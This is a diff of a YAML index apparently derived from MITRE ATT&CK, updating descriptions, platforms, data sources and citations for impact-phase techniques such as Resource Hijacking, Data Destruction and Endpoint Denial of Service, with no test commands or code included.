@@ -58008,7 +58774,8 @@ impact:
         url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1491:
     technique:
@@ -58029,7 +58796,7 @@ impact:
       - source_name: mitre-attack
         external_id: T1491
         url: https://attack.mitre.org/techniques/T1491
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-25T19:34:42.056Z'
       name: Defacement
       description: "Adversaries may modify visual content available internally or
         externally to an enterprise network, thus affecting the integrity of the original
@@ -58056,12 +58823,78 @@ impact:
       x_mitre_impact_type:
       - Integrity
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+    atomic_tests: []
+  T1496.002:
+    technique:
+      modified: '2024-09-25T14:59:35.287Z'
+      name: Bandwidth Hijacking
+      description: "Adversaries may leverage the network bandwidth resources of co-opted
+        systems to complete resource-intensive tasks, which may impact system and/or
+        hosted service availability. \n\nAdversaries may also use malware that leverages
+        a system's network bandwidth as part of a botnet in order to facilitate [Network
+        Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or
+        to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage
+        in proxyjacking by selling use of the victims' network bandwidth and IP address
+        to proxyware services.(Citation: Sysdig Proxyjacking) Finally, they may engage
+        in internet-wide scanning in order to identify additional targets for compromise.(Citation:
+        Unit 42 Leaked Environment Variables 2024)\n\nIn addition to incurring potential
+        financial costs or availability disruptions, this technique may cause reputational
+        damage if a victim’s bandwidth is used for illegal activities.(Citation: Sysdig
+        Proxyjacking)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - Windows
+      - macOS
+      - IaaS
+      - Containers
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Flow'
+      - 'File: File Creation'
+      - 'Command: Command Execution'
+      - 'Process: Process Creation'
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Connection Creation'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--718cb208-6446-4572-a2f0-9c799c60091e
+      created: '2024-09-25T13:44:35.412Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1496/002
+        external_id: T1496.002
+      - source_name: Sysdig Proxyjacking
+        description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
+          Chat. Retrieved July 6, 2023.
+        url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
+      - source_name: Unit 42 Leaked Environment Variables 2024
+        description: Margaret Kelley, Sean Johnstone, William Gamazo, and Nathaniel
+          Quist. (2024, August 15). Leaked Environment Variables Allow Large-Scale
+          Extortion Operation in Cloud Environments. Retrieved September 25, 2024.
+        url: https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/
+      - source_name: GoBotKR
+        description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
+          Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
+        url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1657:
     technique:
-      modified: '2024-04-11T20:22:14.359Z'
+      modified: '2024-10-15T15:58:10.254Z'
       name: Financial Theft
       description: "Adversaries may steal monetary resources from targets through
         extortion, social engineering, technical theft, or other methods aimed at
@@ -58094,7 +58927,7 @@ impact:
       x_mitre_contributors:
       - Blake Strom, Microsoft Threat Intelligence
       - Pawel Partyka, Microsoft Threat Intelligence
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -58104,10 +58937,9 @@ impact:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       x_mitre_impact_type:
@@ -58170,7 +59002,6 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1491.001:
     technique:
@@ -58211,7 +59042,7 @@ impact:
         messages. Since internally defacing systems exposes an adversary''s presence,
         it often takes place after other intrusion goals have been accomplished.(Citation:
         Novetta Blockbuster Destructive Malware)'
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-28T18:55:35.988Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Defacement: Internal Defacement'
       x_mitre_detection: Monitor internal and websites for unplanned content changes.
@@ -58232,9 +59063,157 @@ impact:
       - Integrity
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1491.001
     atomic_tests: []
+  T1496.004:
+    technique:
+      modified: '2024-10-16T17:59:27.535Z'
+      name: Cloud Service Hijacking
+      description: "Adversaries may leverage compromised software-as-a-service (SaaS)
+        applications to complete resource-intensive tasks, which may impact hosted
+        service availability. \n\nFor example, adversaries may leverage email and
+        messaging services, such as AWS Simple Email Service (SES), AWS Simple Notification
+        Service (SNS), SendGrid, and Twilio, in order to send large quantities of
+        spam / [Phishing](https://attack.mitre.org/techniques/T1566) emails and SMS
+        messages.(Citation: Invictus IR DangerDev 2024)(Citation: Permiso SES Abuse
+        2023)(Citation: SentinelLabs SNS Sender 2024) Alternatively, they may engage
+        in LLMJacking by leveraging reverse proxies to hijack the power of cloud-hosted
+        AI models.(Citation: Sysdig LLMJacking 2024)(Citation: Lacework LLMJacking
+        2024)\n\nIn some cases, adversaries may leverage services that the victim
+        is already using. In others, particularly when the service is part of a larger
+        cloud platform, they may first enable the service.(Citation: Sysdig LLMJacking
+        2024) Leveraging SaaS applications may cause the victim to incur significant
+        financial costs, use up service quotas, and otherwise impact availability. "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Modification'
+      - 'Application Log: Application Log Content'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--924d273c-be0d-4d8d-af58-2dddb15ef1e2
+      created: '2024-09-25T14:05:59.910Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1496/004
+        external_id: T1496.004
+      - source_name: SentinelLabs SNS Sender 2024
+        description: Alex Delamotte. (2024, February 15). SNS Sender | Active Campaigns
+          Unleash Messaging Spam Through the Cloud. Retrieved September 25, 2024.
+        url: https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/
+      - source_name: Invictus IR DangerDev 2024
+        description: Invictus Incident Response. (2024, January 31). The curious case
+          of DangerDev@protonmail.me. Retrieved March 19, 2024.
+        url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
+      - source_name: Lacework LLMJacking 2024
+        description: Lacework Labs. (2024, June 6). Detecting AI resource-hijacking
+          with Composite Alerts. Retrieved September 25, 2024.
+        url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
+      - source_name: Sysdig LLMJacking 2024
+        description: 'LLMjacking: Stolen Cloud Credentials Used in New AI Attack.
+          (2024, May 6). Alessandro Brucato. Retrieved September 25, 2024.'
+        url: https://sysdig.com/blog/llmjacking-stolen-cloud-credentials-used-in-new-ai-attack/
+      - source_name: Permiso SES Abuse 2023
+        description: Nathan Eades. (2023, January 12). SES-pionage. Retrieved September
+          25, 2024.
+        url: https://permiso.io/blog/s/aws-ses-pionage-detecting-ses-abuse/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1496.001:
+    technique:
+      modified: '2024-10-13T16:58:38.820Z'
+      name: Compute Hijacking
+      description: "Adversaries may leverage the compute resources of co-opted systems
+        to complete resource-intensive tasks, which may impact system and/or hosted
+        service availability. \n\nOne common purpose for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+        is to validate transactions of cryptocurrency networks and earn virtual currency.
+        Adversaries may consume enough system resources to negatively impact and/or
+        cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus
+        Under The Hood Blog 2017) Servers and cloud-based systems are common targets
+        because of the high potential for available resources, but user endpoint systems
+        may also be compromised and used for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+        and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized
+        environments may also be targeted due to the ease of deployment via exposed
+        APIs and the potential for scaling mining activities by deploying or compromising
+        multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard
+        Malware)(Citation: Trend Micro Exposed Docker APIs)\n\nAdditionally, some
+        cryptocurrency mining malware identify then kill off processes for competing
+        malware to ensure it’s not competing for resources.(Citation: Trend Micro
+        War of Crypto Miners)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      - Containers
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'Network Traffic: Network Connection Creation'
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Traffic Flow'
+      - 'Sensor Health: Host Status'
+      - 'Process: Process Creation'
+      - 'File: File Creation'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--a718a0c8-5768-41a1-9958-a1cc3f995e99
+      created: '2024-09-25T13:34:30.100Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1496/001
+        external_id: T1496.001
+      - source_name: Unit 42 Hildegard Malware
+        description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
+          Malware Targeting Kubernetes. Retrieved April 5, 2021.'
+        url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
+      - source_name: CloudSploit - Unused AWS Regions
+        description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
+          Retrieved October 8, 2019.
+        url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
+      - source_name: Kaspersky Lazarus Under The Hood Blog 2017
+        description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
+          17, 2019.
+        url: https://securelist.com/lazarus-under-the-hood/77908/
+      - source_name: Trend Micro Exposed Docker APIs
+        description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
+          via Exposed APIs. Retrieved April 6, 2021.
+        url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
+      - source_name: Trend Micro War of Crypto Miners
+        description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
+          Miners: A Battle for Resources. Retrieved April 6, 2021.'
+        url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1565:
     technique:
       modified: '2024-02-02T17:18:39.004Z'
@@ -58287,11 +59266,10 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1531:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:35:13.577Z'
       name: Account Access Removal
       description: "Adversaries may interrupt availability of system and network resources
         by inhibiting access to accounts utilized by legitimate users. Accounts may
@@ -58314,6 +59292,7 @@ impact:
         phase_name: impact
       x_mitre_contributors:
       - Hubert Mank
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:
@@ -58331,9 +59310,10 @@ impact:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      x_mitre_version: '1.2'
+      - IaaS
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'User Account: User Account Modification'
@@ -58359,9 +59339,8 @@ impact:
         url: https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1531
     atomic_tests: []
   T1486:
@@ -58448,7 +59427,7 @@ impact:
         NHS Digital Egregor Nov 2020)\n\nIn cloud environments, storage objects within
         compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware
         Part 1)"
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-06-16T13:07:10.318Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Data Encrypted for Impact
       x_mitre_detection: |-
@@ -58472,12 +59451,11 @@ impact:
       - Availability
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1486
     atomic_tests: []
   T1499:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:56:47.424Z'
       name: Endpoint Denial of Service
       description: |
         Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -58496,7 +59474,6 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Alfredo Oliveira, Trend Micro
       - David Fiser, @anu4is, Trend Micro
@@ -58513,18 +59490,13 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
-      x_mitre_version: '1.1'
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Flow'
@@ -58548,8 +59520,8 @@ impact:
       - source_name: FSISAC FraudNetDoS September 2012
         description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
           Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
-          Fraud. Retrieved April 18, 2019.
-        url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+          Fraud. Retrieved September 23, 2024.
+        url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
       - source_name: ArsTechnica Great Firewall of China
         description: Goodin, D.. (2015, March 31). Massive denial-of-service attack
           on GitHub tied to Chinese government. Retrieved April 19, 2019.
@@ -58569,33 +59541,22 @@ impact:
         url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1496:
     technique:
-      modified: '2024-02-14T21:00:00.467Z'
+      modified: '2024-10-13T17:00:09.759Z'
       name: Resource Hijacking
       description: "Adversaries may leverage the resources of co-opted systems to
         complete resource-intensive tasks, which may impact system and/or hosted service
-        availability. \n\nOne common purpose for Resource Hijacking is to validate
-        transactions of cryptocurrency networks and earn virtual currency. Adversaries
-        may consume enough system resources to negatively impact and/or cause affected
-        machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood
-        Blog 2017) Servers and cloud-based systems are common targets because of the
-        high potential for available resources, but user endpoint systems may also
-        be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation:
-        CloudSploit - Unused AWS Regions) Containerized environments may also be targeted
-        due to the ease of deployment via exposed APIs and the potential for scaling
-        mining activities by deploying or compromising multiple containers within
-        an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation:
-        Trend Micro Exposed Docker APIs)\n\nAdditionally, some cryptocurrency mining
-        malware identify then kill off processes for competing malware to ensure it’s
-        not competing for resources.(Citation: Trend Micro War of Crypto Miners)\n\nAdversaries
-        may also use malware that leverages a system's network bandwidth as part of
-        a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498)
-        campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively,
-        they may engage in proxyjacking by selling use of the victims' network bandwidth
-        and IP address to proxyware services.(Citation: Sysdig Proxyjacking)"
+        availability. \n\nResource hijacking may take a number of different forms.
+        For example, adversaries may:\n\n* Leverage compute resources in order to
+        mine cryptocurrency\n* Sell network bandwidth to proxy networks\n* Generate
+        SMS traffic for profit\n* Abuse cloud-based messaging services to send large
+        quantities of spam messages\n\nIn some cases, adversaries may leverage multiple
+        types of Resource Hijacking at once.(Citation: Sysdig Cryptojacking Proxyjacking
+        2023)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
@@ -58606,7 +59567,7 @@ impact:
       - Magno Logan, @magnologan, Trend Micro
       - Vishwas Manral, McAfee
       - Yossi Weizman, Azure Defender Research Team
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: Consider monitoring process resource usage to determine anomalous
         activity associated with malicious hijacking of computer resources such as
@@ -58623,8 +59584,11 @@ impact:
       - Linux
       - macOS
       - Containers
-      x_mitre_version: '1.5'
+      - SaaS
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Modification'
+      - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
       - 'File: File Creation'
@@ -58643,99 +59607,73 @@ impact:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1496
         external_id: T1496
-      - source_name: Unit 42 Hildegard Malware
-        description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
-          Malware Targeting Kubernetes. Retrieved April 5, 2021.'
-        url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
-      - source_name: CloudSploit - Unused AWS Regions
-        description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
-          Retrieved October 8, 2019.
-        url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
-      - source_name: Sysdig Proxyjacking
-        description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
-          Chat. Retrieved July 6, 2023.
-        url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
-      - source_name: Kaspersky Lazarus Under The Hood Blog 2017
-        description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
-          17, 2019.
-        url: https://securelist.com/lazarus-under-the-hood/77908/
-      - source_name: Trend Micro Exposed Docker APIs
-        description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
-          via Exposed APIs. Retrieved April 6, 2021.
-        url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
-      - source_name: Trend Micro War of Crypto Miners
-        description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
-          Miners: A Battle for Resources. Retrieved April 6, 2021.'
-        url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
-      - source_name: GoBotKR
-        description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
-          Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
-        url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+      - source_name: Sysdig Cryptojacking Proxyjacking 2023
+        description: 'Miguel Hernandez. (2023, August 17). LABRAT: Stealthy Cryptojacking
+          and Proxyjacking Campaign Targeting GitLab . Retrieved September 25, 2024.'
+        url: https://sysdig.com/blog/labrat-cryptojacking-proxyjacking-campaign/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1496
     atomic_tests: []
   T1565.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
-      created: '2020-03-02T14:27:00.693Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1565.002
-        url: https://attack.mitre.org/techniques/T1565/002
-      - source_name: DOJ Lazarus Sony 2018
-        url: https://www.justice.gov/opa/press-release/file/1092091/download
-        description: Department of Justice. (2018, September 6). Criminal Complaint
-          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
-      - source_name: FireEye APT38 Oct 2018
-        url: https://content.fireeye.com/apt/rpt-apt38
-        description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
-          November 6, 2018.'
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-08-26T16:33:33.983Z'
+      name: Transmitted Data Manipulation
       description: |-
         Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
 
         Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Transmitted Data Manipulation
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detecting the manipulation of data as at passes over a network
         can be difficult without the appropriate tools. In some cases integrity verification
         checks, such as file hashing, may be used on critical files as they transit
         a network. With some critical processes involving transmission of data, manual
         or out-of-band integrity checking may be useful for identifying manipulated
         data. '
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: impact
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_impact_type:
       - Integrity
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
+      created: '2020-03-02T14:27:00.693Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1565/002
+        external_id: T1565.002
+      - source_name: DOJ Lazarus Sony 2018
+        description: Department of Justice. (2018, September 6). Criminal Complaint
+          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+        url: https://www.justice.gov/opa/press-release/file/1092091/download
+      - source_name: FireEye APT38 Oct 2018
+        description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+          November 6, 2018.'
+        url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1485:
     technique:
-      modified: '2023-10-03T17:30:32.192Z'
+      modified: '2024-09-25T20:46:14.641Z'
       name: Data Destruction
       description: |-
         Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as <code>del</code> and <code>rm</code> often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
@@ -58744,7 +59682,7 @@ impact:
 
         To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).
 
-        In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider)
+        In cloud environments, adversaries may leverage access to delete cloud storage objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
@@ -58770,9 +59708,10 @@ impact:
       - Linux
       - macOS
       - Containers
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Snapshot: Snapshot Deletion'
+      - 'Cloud Storage: Cloud Storage Modification'
       - 'Process: Process Creation'
       - 'File: File Deletion'
       - 'Image: Image Deletion'
@@ -58828,55 +59767,11 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1485
     atomic_tests: []
   T1498:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Linux
-      - macOS
-      - Google Workspace
-      - Containers
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Yossi Weizman, Azure Defender Research Team
-      - Vishwas Manral, McAfee
-      object_marking_refs:
